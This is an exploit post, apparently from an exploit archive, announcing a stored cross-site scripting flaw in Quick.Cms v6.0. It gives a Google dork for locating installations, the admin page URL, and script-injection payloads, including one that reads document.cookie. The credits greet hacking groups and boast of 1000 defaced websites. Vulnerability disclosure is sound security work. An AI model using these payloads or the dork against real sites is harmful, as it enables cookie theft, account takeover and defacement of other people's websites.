facebook facebook twitter rss

QUICK.CMS Stored XSS Vulnerability

Author: Oussama911 , Published: 10-01-2015
#######################################################################################
# Exploit Title: QUICK.CMS Stored XSS Vulnerability
# Date: 03-01-2015
# Google Dork : Quick.Cms v6.0
# Exploit Author: Oussama911
# Version: v6.0
# Vendor Homepage: http://www.opensolution.org/
# Tested on: OWASP Mantra & Iceweasel
# Greetz : Toxic Dz - Dz Mafia - Anonymous Algeria - Virus28 Team - Djamel11154 - Russi173Oox
# Contact : fb.me/ouss911algerianhacker
# contact team : fb.me/teamvirus28
# Vulnerability Description:

CMS is vulnerable to Stored XSS. You can run XSS payloads at new page section.

XSS Vulnerability #1:

Go add new page

"http://{target-url}/admin.php?p=pages-form"

Set content name value;

"><script>alert(String.fromCharCode(48, 120, 57, 55))</script>

or

"><script>alert(document.cookie)</script>


========
Credits:
========

Vulnerability found and advisory written by Oussama911 ( Virus28 Team )

# 1000 website on zone-h it is not like a 1 exploit at www.exploit4arab.net ^_^

#######################################################################################

Like us on Facebook :